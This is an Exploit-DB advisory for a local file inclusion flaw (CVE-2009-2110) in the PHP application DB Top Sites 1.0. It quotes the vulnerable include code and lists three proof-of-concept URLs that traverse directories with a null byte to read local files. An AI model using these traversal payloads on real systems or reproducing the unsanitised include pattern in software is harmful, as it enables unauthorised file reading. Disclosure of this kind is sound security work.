DB Top Sites 1.0 (index.php u) Local File Inclusion Vulnerability

EDB-ID: 8952	CVE: 2009-2110	OSVDB-ID: 55116
Author: SirGod	Published: 2009-06-15	Verified:
Exploit Code:	Vulnerable App: N/A

######################################################################
[+] DB Top Sites v1.0 (index.php u) Local File Inclusion Vulnerability
[+] Discovered By SirGod
[+] www.mortal-team.org
#######################################################################
[+] Local File Inclusion
 - Vulnerable code is everywhere
-------------------------------------------------------------------------------------------------------
if ( $u != "" ) {
if ( file_exists( "./sites/session/$u.session.php" ) ){
include "./sites/session/$u.session.php";
include "./sites/$u.php";
-------------------------------------------------------------------------------------------------------
- PoC's
    http://127.0.0.1/[path]/full.php?u=../../../../../../BOOTSECT.BAK%00
    http://127.0.0.1/[path]/index.php?u=../../../../../../BOOTSECT.BAK%00
    http://127.0.0.1/[path]/contact.php?u=../../../../../../BOOTSECT.BAK%00
#######################################################################
# milw0rm.com [2009-06-15]

Comments

DB Top Sites 1.0 (index.php u) Local File Inclusion Vulnerability

Rating

No comments so far